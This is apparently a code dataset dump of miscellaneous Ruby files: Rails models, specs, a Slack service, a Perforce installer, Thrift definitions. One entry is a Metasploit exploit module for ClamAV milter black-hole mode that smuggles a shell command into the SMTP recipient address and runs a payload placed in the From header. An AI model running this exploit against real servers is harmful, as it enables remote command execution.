hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1) |
---|---|---|---|---|---|
33f59e8d3e46e7fb9b183522440918b1bb3f0c15 | 819 | # frozen_string_literal: true
require 'csv'

class InvoiceExporter
  HEADERS = [
    'Kdnr', 'Name1', 'Name2', 'Strasse', 'Plz', 'Ort',
    'RG-Nummer', 'Inkl. MWST', 'exkl. MWST', 'ESR-Ref.Nr.'
  ].freeze

  def initialize(invoices = Invoice.all)
    @invoices = invoices
  end

  def export(options = {})
    CSV.generate(**csv_options.merge(options)) do |csv|
      csv << HEADERS
      @invoices.each { |invoice| csv << invoice_attributes(invoice) }
    end
  end

  def csv_options
    { headers: true, force_quotes: true }
  end

  def invoice_attributes(invoice)
    invoice.instance_eval do
      lagerleiter = unit.lagerleiter
      [
        unit.id, unit.title,
        lagerleiter.full_name, lagerleiter.address, lagerleiter.zip_code, lagerleiter.town,
        id, amount, amount, ref
      ]
    end
  end
end
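
# Usage sketch (illustrative only): Invoice, unit and lagerleiter are models
# assumed to exist in the host application, and the col_sep option simply
# shows an extra CSV option being merged in by #export.
exported_csv = InvoiceExporter.new(Invoice.all).export(col_sep: ';')
File.write('invoices.csv', exported_csv)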
| 22.135135 | 91 | 0.632479 |
791768014a38c510b75c79efab8ad3930a33be84 | 417 | require 'spec_helper'
describe Inquiry::Node::Base, type: :model, dbscope: :example do
  let(:item) { create :inquiry_node_base }

  it_behaves_like "cms_node#spec"
end

describe Inquiry::Node::Form, type: :model, dbscope: :example do
  let(:item) { create :inquiry_node_form }

  it_behaves_like "cms_node#spec"

  it do
    expect(item.released).to be_present
    expect(item.first_released).to be_present
  end
end
| 24.529412 | 64 | 0.736211 |
33e00dc3445699b5e9ce4f98a070c9f185c2be42 | 2,140 | # frozen_string_literal: true
module SamsonSlackWebhooks
class SlackWebhooksService
# users in the format jquery mentions input needs
# see _notify_buddy_box.html.erb
def users
unless slack_api_token
Rails.logger.error('Set the SLACK_API_TOKEN env variable to enable user mention autocomplete.')
return []
end
Rails.cache.fetch(:slack_users, expires_in: 5.minutes, race_condition_ttl: 5) do
begin
body = JSON.parse(Faraday.post("https://slack.com/api/users.list", token: slack_api_token).body)
if body['ok']
body['members'].map do |user|
{
id: user['id'],
name: user['name'],
avatar: user['profile']['image_48'],
type: 'contact'
}
end
else
Rails.logger.error("Error fetching slack users: #{body['error']}")
[]
end
rescue StandardError
Rails.logger.error("Error fetching slack users (token invalid / service down). #{$!.class}: #{$!}")
[]
end
end
end
def deliver_message_via_webhook(webhook:, message:, attachments:)
payload = {
text: message,
username: 'Samson',
icon_url: "https://github.com/zendesk/samson/blob/master/app/assets/images/favicons/32x32_light.png?raw=true"
}
payload[:channel] = webhook.channel unless webhook.channel.blank?
payload[:attachments] = attachments if attachments.present?
begin
response = Faraday.post(webhook.webhook_url, payload: payload.to_json)
raise "Error #{response.status} #{response.body.to_s[0..100]}" if response.status >= 300
rescue Faraday::ClientError, RuntimeError => e
ErrorNotifier.notify(
e,
webhook_id: webhook.id,
channel: webhook.channel,
url: webhook.stage&.url
)
Rails.logger.error("Could not deliver slack message to webhook #{webhook.id}: #{e.message}")
end
end
private
def slack_api_token
ENV['SLACK_API_TOKEN']
end
end
end
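
# Usage sketch (illustrative only, assumes the Samson app environment for
# Rails.logger/ActiveSupport): the hook below is a stand-in for Samson's
# webhook model and only needs to respond to #webhook_url, #channel, #id and
# #stage as used by #deliver_message_via_webhook above; the URL is a placeholder.
require 'ostruct'
hook = OpenStruct.new(id: 1, channel: '#deploys',
                      webhook_url: 'https://hooks.slack.com/services/T000/B000/XXX', stage: nil)
SamsonSlackWebhooks::SlackWebhooksService.new.deliver_message_via_webhook(
  webhook: hook, message: 'Deploy finished', attachments: nil
)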
| 33.4375 | 117 | 0.600935 |
f83298d024c2af185d226cd06eb29b42d415ca60 | 5,364 | # frozen_string_literal: true
module Results
module CSV
# Temporarily holds the next row of the CSV output while it is being populated.
# Responsible for preparing the row to receive new answer data by copying common data
# (response data and parent group data) from the previous row of the CSV output.
# Also responsible for dumping rows to the CSV handler when it's time to start a fresh row.
class Buffer
attr_accessor :csv, :output_rows, :header_map, :empty, :group_path,
:applicable_rows_stack, :group_names
delegate :empty?, to: :output_rows
def initialize(header_map:)
self.header_map = header_map
self.group_path = GroupPath.new
self.group_names = {}
self.empty = true
# Holds the rows we are currently collecting information for and waiting to write out to CSV.
# These are all due to a single response. We dump the buffer each time we change responses.
self.output_rows = []
# A stack of frames (arrays) of indices of rows in the buffer.
# Each frame represents a level of nesting.
# The indices in the top-most frame on the stack correspond to rows that should be
# written to when `write` is called.
# It might look like [[0, 1, 2, 3], [2, 3], [3]] if we are in a doubly nested group.
self.applicable_rows_stack = []
end
# Takes a row from the DB result and prepares the buffer for new data.
# Dumps the row when appropriate (i.e. when the group path changes).
def process_row(input_row)
group_path.process_row(input_row)
handle_group_path_deletions if group_path.deletions?
handle_group_path_additions(input_row) if group_path.additions?
write_group_name
end
# Writes the given value to the applicable rows in the buffer.
# If a cell already has something in it and `append` is true, it appends (useful for select_multiple).
# If the given header is not found, ignores.
def write(header, value, append: false)
col_idx = header_map.index_for(header)
return if col_idx.nil?
applicable_rows_stack.last.each do |row_idx|
output_rows[row_idx][col_idx] =
if (current = output_rows[row_idx][col_idx]).present? && append
"#{current};#{value}"
else
value
end
end
end
def finish
dump_rows
end
private
def handle_group_path_deletions
applicable_rows_stack.pop(group_path.deletion_count)
dump_rows if applicable_rows_stack.empty?
end
def handle_group_path_additions(input_row)
group_path.addition_count.times do
add_row
applicable_rows_stack.push([])
# The new row we just added carries information from all levels currently represented
# in the stack. So we write the row index to each frame in the stack.
applicable_rows_stack.each { |r| r << output_rows.size - 1 }
# If we just added the first row, we should write the common columns to get it started.
# Subsequent output_rows will be cloned from this one so we only need to do it once.
write_common_columns(input_row) if output_rows.size == 1
end
end
def write_common_columns(input_row)
header_map.common_headers.each { |h| write(h, input_row[h]) }
end
def write_group_name
write_cell(row_for_current_level, "parent_group_name", current_group_name)
end
# Adds a row to the buffer by cloning the parent row, or if empty, adding a new blank row.
def add_row
new_row =
if output_rows.any?
row_for_current_level.dup
else
Array.new(header_map.count)
end
# We need to reset the group columns because they change each time. The rest of the columns
# should be inherited from the parent column.
write_cell(new_row, "parent_group_name", nil)
write_cell(new_row, "parent_group_depth", applicable_rows_stack.size)
output_rows << new_row
end
def row_for_current_level
# The current row is the first index in the current stack frame. The rest of the indices in
# the current stack frame come from rows for child levels.
current_row_idx = applicable_rows_stack.last.first
output_rows[current_row_idx]
end
def read_cell(row, col_name)
row[header_map.index_for(col_name)]
end
def write_cell(row, col_name, value)
return if row.nil?
row[header_map.index_for(col_name)] = value
end
def dump_rows
output_rows.each do |row|
# No need to write rows that don't have any answers for their level, except we always
# write a row for the top level of the response even if it has no answer data of its own.
next if read_cell(row, "parent_group_depth").positive? && read_cell(row, "parent_group_name").nil?
csv << row
end
output_rows.clear
end
def current_group_name
group_id = group_path.parent_repeat_group_id
return nil if group_id.nil?
group_names[group_id] ||= (QingGroup.find_by(id: group_id)&.group_name || "?")
end
end
end
end
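
# Standalone sketch (separate from the Buffer class above) of the
# applicable_rows_stack bookkeeping it describes: each stack frame holds the
# indices of the buffered rows that a value written at that nesting level
# should land in.
rows  = [["resp-1", nil], ["resp-1", nil]] # two rows cloned for a nested repeat group
stack = [[0, 1], [1]]                      # outer frame covers both rows, inner frame only the second
stack.last.each { |i| rows[i][1] = "inner answer" }
# rows is now [["resp-1", nil], ["resp-1", "inner answer"]]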
| 38.589928 | 108 | 0.656972 |
2889cb26ce60087343b3da59f2b2ada6881907c6 | 2,793 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Smtp
def initialize(info = {})
super(update_info(info,
'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
'Description' => %q{
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
When implemented with black hole mode enabled, it is possible to execute
commands remotely due to an insecure popen call.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-4560' ],
[ 'OSVDB', '36909' ],
[ 'BID', '25439' ],
[ 'URL', 'http://www.milw0rm.com/exploits/4761' ],
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Aug 24 2007',
'DefaultTarget' => 0))
register_options(
[
OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
], self.class)
end
def exploit
# ClamAV writes randomized msg.###### temporary files in a randomized
# /tmp/clamav-#######################/ directory. This directory is
# the clamav-milter process working directory.
#
# We *can* execute arbitrary code directly from 'sploit', however the
# SMTP RFC rejects all payloads with the exception of generic CMD
# payloads due to the IO redirects. I discovered that the 'From:'
# header is written to this temporary file prior to the vulnerable
# call, so we call the file itself and payload.encoded is executed.
sploit = "sh msg*" # Execute the clamav-milter temporary file.
# Create the malicious RCPT TO before connecting,
# to make good use of the Msf::Exploit::Smtp support.
oldaddr = datastore['MAILTO']
newaddr = oldaddr.split('@')
datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"
connect_login
sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
sock.put(".\r\n")
# Clean up RCPT TO afterwards
datastore['MAILTO'] = oldaddr
handler
disconnect
end
end
| 27.93 | 93 | 0.620122 |
91b070ad17c4f229a9e33056afef4dd24f500fd9 | 1,080 | class Team < ApplicationRecord
  has_many :primaries
  has_many :shares
  has_many :alternates
  has_many :trainees
  has_many :rosters

  # NOTE: the original declared `has_many :users, through: ...` four times,
  # which makes each declaration overwrite the previous one. The extra
  # association names below are illustrative choices to avoid that clash.
  has_many :users, through: :primaries
  has_many :shared_users,    through: :shares,     source: :user
  has_many :alternate_users, through: :alternates, source: :user
  has_many :trainee_users,   through: :trainees,   source: :user

  def get_lead
    if lead
      User.find(lead).full_name
    else
      "Not Set"
    end
  end

  def display_shared
    shares.map { |s| s.user.full_name }.join(", ")
  end

  def display_alternates
    alternates.map { |s| s.user.full_name }.join(", ")
  end

  def display_trainees
    trainees.map { |s| s.user.full_name }.join(", ")
  end

  def type_1
    complexity == "Type 1"
  end

  def type_2
    complexity == "Type 2"
  end
end
| 18.947368 | 60 | 0.631481 |
1a3cb0101998101bc7163b9dfc8ac5aba80ddf88 | 10,622 | #
# Author: James M. Lawrence <[email protected]>.
#
require 'net/ftp'
require 'rbconfig'
require 'ostruct'
require 'fileutils'
require 'optparse'
require 'pathname'
class Installer
include FileUtils
CONFIG = Config::CONFIG
BIT64 = (1.size == 8)
RB_BASENAME = Pathname.new "P4.rb"
SO_BASENAME = Pathname.new "P4.#{CONFIG['DLEXT']}"
RAW_INSTALL_FILES = [
Pathname.new(CONFIG["sitelibdir"]) + RB_BASENAME,
Pathname.new(CONFIG["sitearchdir"]) + SO_BASENAME,
]
GEM_INSTALL_FILES = [
Pathname.new("lib") + RB_BASENAME,
Pathname.new("ext") + SO_BASENAME,
]
SERVER = "ftp.perforce.com"
SERVER_TOP_DIR = Pathname.new "perforce"
# Mysterious "ghost" releases which lack files
HOSED_VERSIONS = %w[09.3 11.2 12.3 12.4]
P4API_REMOTE_BASENAME = Pathname.new "p4api.tgz"
P4RUBY_REMOTE_BASENAME = Pathname.new "p4ruby.tgz"
WORK_DIR = Pathname.new "work"
DISTFILES_DIR = WORK_DIR + "distfiles"
BUILD_DIR = WORK_DIR + "build"
def parse_command_line
OptionParser.new("Usage: ruby install.rb [options]", 24, "") {
|parser|
parser.on(
"--version NN.N",
"Version to download, e.g. 10.2. Default finds latest.") {
|version|
@s.version = version
}
parser.on(
"--list-versions",
"List available versions.") {
@s.list_versions = true
}
parser.on(
"--platform PLATFORM",
"Perforce-named platform to download. Default guesses.") {
|platform|
@s.platform = platform
}
parser.on(
"--list-platforms",
"List available platforms for the given version.") {
@s.list_platforms = true
}
parser.on(
"--gem",
"Gem configuration (for the gem installer).") {
@s.gem_config = true
}
parser.on(
"--uninstall",
"Uninstall.") {
@s.uninstall = true
}
parser.on(
"--local",
"Use the files in work/distfiles (manual download).") {
@s.local = true
}
parser.parse(ARGV)
}
end
def run
@s = LazyStruct.new
parse_command_line
config
if @s.uninstall
uninstall
elsif @s.list_platforms
puts platforms
elsif @s.list_versions
puts versions
elsif @s.platform.nil?
platform_fail
elsif @s.platform =~ %r!\Ant!
windows_install
else
fetch
build
install
verify_install
end
end
def config
if CONFIG["LIBRUBYARG_SHARED"].empty?
raise "error: ruby must be configured with --enable-shared"
end
@s.p4api = LazyStruct.new.tap { |t|
t.basename = P4API_REMOTE_BASENAME
}
@s.p4ruby = LazyStruct.new.tap { |t|
t.basename = P4RUBY_REMOTE_BASENAME
}
@s.specs = [ @s.p4ruby, @s.p4api ]
@s.specs.each { |spec|
spec.attribute(:local) {
DISTFILES_DIR + spec.basename
}
}
unless @s.platform
@s.attribute(:platform) {
guess_platform
}
end
unless @s.version
@s.attribute(:version) {
latest_version
}
end
@s.attribute(:version_dir) {
SERVER_TOP_DIR + "r#{@s.version}"
}
@s.p4api.attribute(:remote) {
@s.version_dir + "bin.#{@s.platform}" + @s.p4api.basename
}
@s.p4ruby.attribute(:remote) {
@s.version_dir + "bin.tools" + @s.p4ruby.basename
}
@s.attribute(:ftp) {
Net::FTP.new(SERVER).tap { |t|
t.passive = true
t.login
}
}
end
def guess_cpu
if CONFIG["target_os"] =~ %r!darwin!
# specific binaries were removed in p4api-09.1
"u"
else
case CONFIG["target_cpu"]
when %r!ia!i
"ia64"
when %r!86!
# note: with '_'
"x86" + (BIT64 ? "_64" : "")
when %r!(ppc|sparc)!i
# note: without '_'
$1 + (BIT64 ? "64" : "")
else
""
end
end
end
def guess_version(os)
if match = `uname -a`.match(%r!#{os}\s+\S+\s+(\d+)\.(\d+)!i)
version = match.captures.join
cpu = guess_cpu
platforms = self.platforms
(0..version.to_i).map { |n|
[os, n.to_s, cpu].join
}.select { |platform|
platforms.include? platform
}.last
else
nil
end
end
def guess_platform(opts = {})
config_os = CONFIG["target_os"].downcase
windows_cpu = BIT64 ? "x64" : "x86"
if config_os =~ %r!cygwin!i
"cygwin" + windows_cpu
elsif config_os =~ %r!(mswin|mingw)!i
"nt" + windows_cpu
elsif @s.local
"<local>"
else
if match = config_os.match(%r!\A\D+!)
guess_version(match[0])
else
nil
end
end
end
def platform_fail
install_fail {
@s.version = "<version>"
@s.platform = "<platform>"
message = %Q{
Auto-fetch not yet handled for this platform. Run:
\truby install.rb --list-platforms
to see the available platforms, then run
\truby install.rb --platform PLATFORM
with your platform.
If all of the above fails, manually fetch
\tftp://#{SERVER}/#{@s.p4api.remote}
Copy it to #{@s.p4api.local} and run install.rb --local.
}.gsub(%r!^ +(?=\S)!, "")
mkdir_p(DISTFILES_DIR)
puts message
}
end
def install_fail
yield
exit(1)
end
def sys(*args)
system(*args).tap { |result|
unless result
raise "system() failed: #{args.join(" ")}"
end
}
end
def unpack(distfile, target_dir)
sys("tar", "zxvf", distfile.to_s, "-C", target_dir.to_s)
end
def fetch_spec(spec)
unless @s.local
mkdir_p(spec.local.dirname)
puts "downloading ftp://#{SERVER}/#{spec.remote} ..."
@s.ftp.getbinaryfile(spec.remote.to_s, spec.local.to_s)
end
end
def fetch
@s.specs.each { |spec|
fetch_spec(spec)
}
end
def remote_files_matching(dir, regex)
@s.ftp.ls(dir.to_s).map { |entry|
if match = entry.match(regex)
yield match
else
nil
end
}.reject { |entry|
entry.nil?
}
end
def platforms
remote_files_matching(@s.version_dir, %r!bin\.(\w+)!) { |match|
match.captures.first
}.reject { |platform|
platform =~ %r!java!
}.sort
end
def versions
remote_files_matching(SERVER_TOP_DIR, %r!r([0-8]\d\.\d)!) { |match|
match.captures.first
}.reject { |version|
HOSED_VERSIONS.include? version
}.sort
end
def latest_version
versions.last
end
def make(*args)
sys("make", *args)
end
def ruby(*args)
exe = Pathname.new(CONFIG["bindir"]) + CONFIG["RUBY_INSTALL_NAME"]
sys(exe.to_s, *args)
end
def build
puts "building..."
rm_rf(BUILD_DIR)
mkdir_p(BUILD_DIR)
@s.specs.each { |spec|
unpack(spec.local, BUILD_DIR)
}
Dir.chdir(BUILD_DIR) {
api_dir = Pathname.glob("p4api*").last
p4ruby_dir = Pathname.glob("p4ruby*").last
Dir.chdir(p4ruby_dir) {
ruby("p4conf.rb", "--apidir", "../#{api_dir}")
make
}
@s.p4ruby_build_dir = BUILD_DIR + p4ruby_dir
}
end
def raw_install_to_gem_install
RAW_INSTALL_FILES.zip(GEM_INSTALL_FILES) { |source, dest|
mkdir_p(dest.dirname)
puts "move #{source} --> #{dest}"
mv(source, dest)
}
end
def install
puts "installing..."
Dir.chdir(@s.p4ruby_build_dir) {
make("install")
}
if @s.gem_config
raw_install_to_gem_install
end
end
def verify_install(on_error = nil)
puts "verifying..."
files =
if @s.gem_config
GEM_INSTALL_FILES
else
RAW_INSTALL_FILES
end.map { |t| t.expand_path }
if files.all? { |t| t.exist? }
puts "Installed files:"
puts files
elsif on_error
install_fail(&on_error)
else
install_fail {
puts "These files were supposed to be installed, but were not:"
puts files
puts "Install failed!"
}
end
end
def windows_install
#
# For Windows, p4ruby is located in the p4api directory on the
# perforce server -- switcharoo --
#
spec = @s.p4api
version = [CONFIG["MAJOR"], CONFIG["MINOR"]].join
spec.basename = "p4ruby#{version}.exe"
fetch_spec(spec)
error = lambda {
puts "The Perforce P4Ruby Windows installer failed!"
puts "You may re-run it manually here:"
puts spec.local.expand_path
}
puts "running Perforce P4Ruby Windows installer..."
if system(spec.local, "/S", "/v/qn")
if @s.gem_config
sleep(1)
raw_install_to_gem_install
sleep(1)
unless system(spec.local, "/V", "/x", "/S", "/v/qn")
# We don't much care if this fails; just write to the log
puts "Note: the Perforce P4Ruby Windows uninstaller failed."
end
end
verify_install(error)
else
install_fail(&error)
end
end
def uninstall
RAW_INSTALL_FILES.each { |file|
if file.exist?
puts "delete #{file}"
rm_f(file)
end
}
end
end
#
# An OpenStruct with optional lazy-evaluated fields.
#
class LazyStruct < OpenStruct
#
# For mixing into an existing OpenStruct instance singleton class.
#
module Mixin
#
# &block is evaluated when this attribute is requested. The
# same result is returned for subsequent calls, until the field
# is assigned a different value.
#
def attribute(reader, &block)
singleton = (class << self ; self ; end)
singleton.instance_eval {
#
# Define a special reader method in the singleton class.
#
define_method(reader) {
block.call.tap { |value|
#
# The value has been computed. Replace this method with a
# one-liner giving the value.
#
singleton.instance_eval {
remove_method(reader)
define_method(reader) { value }
}
}
}
#
# Revert to the old OpenStruct behavior when the writer is called.
#
writer = "#{reader}=".to_sym
define_method(writer) { |value|
singleton.instance_eval {
remove_method(reader)
remove_method(writer)
}
method_missing(writer, value)
}
}
end
end
include Mixin
end
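
# Usage sketch: the block passed to #attribute runs on first access and the
# result is memoized until the field is explicitly reassigned.
settings = LazyStruct.new
settings.attribute(:greeting) { "hello-#{rand(100)}" }
first  = settings.greeting        # block evaluated here
second = settings.greeting        # memoized; equal to `first`
settings.greeting = "overridden"  # writer reverts to plain OpenStruct behavior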
# version < 1.8.7 compatibility
module Kernel
unless respond_to? :tap
def tap
yield self
self
end
end
end
Installer.new.run
| 22.129167 | 74 | 0.573715 |
ffae24f261c2a4085e94c3d0f0dabd43b76e62fc | 1,221 | module DL
  module Win32Types
    def included(m)
      m.module_eval{
        typealias "DWORD", "unsigned long"
        typealias "PDWORD", "unsigned long *"
        typealias "WORD", "unsigned short"
        typealias "PWORD", "unsigned short *"
        typealias "BOOL", "int"
        typealias "ATOM", "int"
        typealias "BYTE", "unsigned char"
        typealias "PBYTE", "unsigned char *"
        typealias "UINT", "unsigned int"
        typealias "ULONG", "unsigned long"
        typealias "UCHAR", "unsigned char"
        typealias "HANDLE", "unsigned long"
        typealias "PHANDLE", "void*"
        typealias "PVOID", "void*"
        typealias "LPCSTR", "char*"
        typealias "LPSTR", "char*"
        typealias "HINSTANCE", "unsigned int"
        typealias "HDC", "unsigned int"
        typealias "HWND", "unsigned int"
      }
    end
    module_function :included
  end

  module BasicTypes
    def included(m)
      m.module_eval{
        typealias "uint", "unsigned int"
        typealias "u_int", "unsigned int"
        typealias "ulong", "unsigned long"
        typealias "u_long", "unsigned long"
      }
    end
    module_function :included
  end
end
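
# Usage sketch (assumes the legacy Ruby 1.8 DL API; the library and function
# below are only an example): a module that extends DL::Importable can include
# DL::Win32Types so the Windows-style names defined above work in extern
# signatures.
require 'dl/import'
module Kernel32Sample
  extend DL::Importable
  dlload 'kernel32'
  include DL::Win32Types                 # registers DWORD, HANDLE, BOOL, ...
  extern 'DWORD GetCurrentProcessId()'   # DWORD resolved via the typealias above
end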
| 29.780488 | 46 | 0.568387 |
f8d80d9383d351595078cc55e0ac758d1ec29d9e | 1,894 | require 'rails_helper'
RSpec.describe 'Sign Up', type: :feature do
  let(:user) { User.create(username: 'Foo Bar', email: '[email protected]', password: '12345678') }

  scenario 'Sign up' do
    visit new_user_registration_path
    fill_in 'Username', with: 'Foo Bar'
    fill_in 'Email', with: '[email protected]'
    fill_in 'Password', with: '12345678'
    fill_in 'Password confirmation', with: '12345678'
    click_on 'Sign up'
    sleep(3)
    visit root_path
    expect(page).to have_content('Foo Bar')
  end

  scenario 'Sign up with absurd inputs' do
    visit new_user_registration_path
    fill_in 'Username', with: ''
    fill_in 'Email', with: '[email protected]'
    fill_in 'Password', with: '12345678'
    fill_in 'Password confirmation', with: '12345678'
    click_on 'Sign up'
    sleep(3)
    visit root_path
    expect(page).to_not have_content('Foo Bar')
  end
end

RSpec.describe 'Sign In', type: :feature do
  let(:user) { User.create(username: 'Foo Bar', email: '[email protected]', password: '12345678') }

  scenario 'Log in' do
    visit new_user_session_path
    fill_in 'Email', with: user.email
    fill_in 'Password', with: user.password
    click_on 'Log in'
    sleep(3)
    visit root_path
    expect(page).to have_content('Foo Bar')
  end

  scenario 'Log in with invalid inputs' do
    visit new_user_session_path
    fill_in 'Email', with: 'xyz'
    fill_in 'Password', with: user.password
    click_on 'Log in'
    sleep(3)
    expect(page).to_not have_content('Foo Bar')
  end
end

RSpec.describe 'Log Out', type: :feature do
  let(:user) { User.create(username: 'Foo Bar', email: '[email protected]', password: '12345678') }

  scenario 'Log Out' do
    visit new_user_session_path
    fill_in 'Email', with: user.email
    fill_in 'Password', with: user.password
    click_on 'Log in'
    sleep(8)
    click_on 'sign out'
    sleep(3)
    visit root_path
    expect(page).to have_content('')
  end
end
| 28.268657 | 93 | 0.671595 |
87bed5c4f141090f2dae67a2f7febbb13e6832cf | 1,161 | # Copyright 2017 OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
# OpenCensus is a vendor-agnostic single distribution of libraries to provide
# metrics collection and tracing for your services. See https://opencensus.io/
# for general information on OpenCensus.
#
# The OpenCensus module provides a namespace for the Ruby implementation of
# OpenCensus, including the core libraries for OpenCensus metrics and tracing.
#
module OpenCensus
end
require "opencensus/common"
require "opencensus/config"
require "opencensus/context"
require "opencensus/stats"
require "opencensus/tags"
require "opencensus/trace"
require "opencensus/version"
| 34.147059 | 78 | 0.78553 |
034253507fa3321528d587bd0ce58cd16c1de195 | 136 | module Api
  module Private
    class TopProfileImageSerializer < ActiveModel::Serializer
      attributes :image_url
    end
  end
end
| 17 | 61 | 0.742647 |
28e109b5f9bb35c78cd5d250b1d6e41d535e20c4 | 157 | require "iso3166_ru/version"
require "iso3166_ru/country_list"
module Iso3166Ru
  def self.find_by(query)
    CountryList.instance.find_by(query)
  end
end
| 17.444444 | 39 | 0.789809 |
391d6c0c5ab7bd50dc9cc7f2bc20ea9c20ebe6f3 | 107 | # frozen_string_literal: true
module TTY
  class Spinner
    VERSION = "10.0.0"
  end # Spinner
end # TTY
| 13.375 | 29 | 0.682243 |
264d323544300e5cf490a30877b22433b7a4669c | 34,785 | #
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
require 'BoxalinoPackage/thrift'
module DateRangeGap
SECOND = 1
MINUTE = 2
HOUR = 3
DAY = 4
WEEK = 5
MONTH = 6
YEAR = 7
DECADE = 8
CENTURY = 9
VALUE_MAP = {1 => "SECOND", 2 => "MINUTE", 3 => "HOUR", 4 => "DAY", 5 => "WEEK", 6 => "MONTH", 7 => "YEAR", 8 => "DECADE", 9 => "CENTURY"}
VALID_VALUES = Set.new([SECOND, MINUTE, HOUR, DAY, WEEK, MONTH, YEAR, DECADE, CENTURY]).freeze
end
module FacetSortOrder
POPULATION = 1
COLLATION = 2
VALUE_MAP = {1 => "POPULATION", 2 => "COLLATION"}
VALID_VALUES = Set.new([POPULATION, COLLATION]).freeze
end
# Filter to be used in query. Note that type of generated filter depends on first non-null and non-empty value in order of preference. Values of lower priority are ignored:
# stringValues!=null && simpleValues.size()>0 => simple match, prefix!=null => prefix match, hierarchy!=null && hierarchy.size()>0 => hierarchy filter, else range filter
#
# <dl>
# <dt>negative</dt>
# <dd>whether the filter is negative (boolean NOT)</dd>
#
# <dt>fieldName</dt>
# <dd>field name to apply filter to</dd>
#
# <dt>stringValues</dt>
# <dd>values for simple match</dd>
#
# <dt>prefix</dt>
# <dd>prefix match</dd>
#
# <dt>hierarchyId</dt>
# <dd>hierarchy filter - when corresponding hierarchical field has encoded id</dd>
#
# <dt>hierarchy</dt>
# <dd>hierarchy filter - for example categories path in top-down order</dd>
#
# <dt>rangeFrom</dt>
# <dd>lower bound for range filter</dd>
#
# <dt>rangeFromInclusive</dt>
# <dd>whether the lower bound is inclusive</dd>
#
# <dt>rangeTo</dt>
# <dd>upper bound for range filter</dd>
#
# <dt>rangeToInclusive</dt>
# <dd>whether the upper bound is inclusive</dd>
# </dl>
class Filter
include ::Thrift::Struct, ::Thrift::Struct_Union
NEGATIVE = 1
FIELDNAME = 2
STRINGVALUES = 3
PREFIX = 4
HIERARCHYID = 41
HIERARCHY = 5
RANGEFROM = 6
RANGEFROMINCLUSIVE = 7
RANGETO = 8
RANGETOINCLUSIVE = 9
FIELDS = {
NEGATIVE => {:type => ::Thrift::Types::BOOL, :name => 'negative'},
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
STRINGVALUES => {:type => ::Thrift::Types::LIST, :name => 'stringValues', :element => {:type => ::Thrift::Types::STRING}},
PREFIX => {:type => ::Thrift::Types::STRING, :name => 'prefix'},
HIERARCHYID => {:type => ::Thrift::Types::STRING, :name => 'hierarchyId'},
HIERARCHY => {:type => ::Thrift::Types::LIST, :name => 'hierarchy', :element => {:type => ::Thrift::Types::STRING}},
RANGEFROM => {:type => ::Thrift::Types::STRING, :name => 'rangeFrom'},
RANGEFROMINCLUSIVE => {:type => ::Thrift::Types::BOOL, :name => 'rangeFromInclusive'},
RANGETO => {:type => ::Thrift::Types::STRING, :name => 'rangeTo'},
RANGETOINCLUSIVE => {:type => ::Thrift::Types::BOOL, :name => 'rangeToInclusive'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
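
# Construction sketch (illustrative): Thrift structs accept a hash of field
# names, so a numeric range filter as documented above could be built like
# this (the field name and bounds are made up).
price_filter = Filter.new(
  fieldName: 'discountedPrice',
  rangeFrom: '10', rangeFromInclusive: true,
  rangeTo: '50', rangeToInclusive: false
)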
# <dl>
# <dt>stringValue</dt>
# <dd>corresponding value of the facet</dd>
#
# <dt>rangeFromInclusive</dt>
# <dd>if range facets lower bound (inclusive)</dd>
#
# <dt>rangeToExclusive</dt>
# <dd>if range facets upper bound (inclusive)</dd>
#
# <dt>hitCount</dt>
# <dd>number of hits found</dd>
#
# <dt>hierarchyId</dt>
# <dd>id of hierarchy if corresponding field is hierarchical</dd>
#
# <dt>hierarchy</dt>
# <dd>hierarchy if corresponding field is hierarchical</dd>
#
# <dt>selected</dt>
# <dd>whether the facet value has been selected in corresponding FacetRequest</dd>
# </dl>
class FacetValue
include ::Thrift::Struct, ::Thrift::Struct_Union
STRINGVALUE = 1
RANGEFROMINCLUSIVE = 2
RANGETOEXCLUSIVE = 3
HITCOUNT = 4
HIERARCHYID = 50
HIERARCHY = 60
SELECTED = 70
FIELDS = {
STRINGVALUE => {:type => ::Thrift::Types::STRING, :name => 'stringValue'},
RANGEFROMINCLUSIVE => {:type => ::Thrift::Types::STRING, :name => 'rangeFromInclusive'},
RANGETOEXCLUSIVE => {:type => ::Thrift::Types::STRING, :name => 'rangeToExclusive'},
HITCOUNT => {:type => ::Thrift::Types::I64, :name => 'hitCount'},
HIERARCHYID => {:type => ::Thrift::Types::STRING, :name => 'hierarchyId'},
HIERARCHY => {:type => ::Thrift::Types::LIST, :name => 'hierarchy', :element => {:type => ::Thrift::Types::STRING}},
SELECTED => {:type => ::Thrift::Types::BOOL, :name => 'selected'}
}
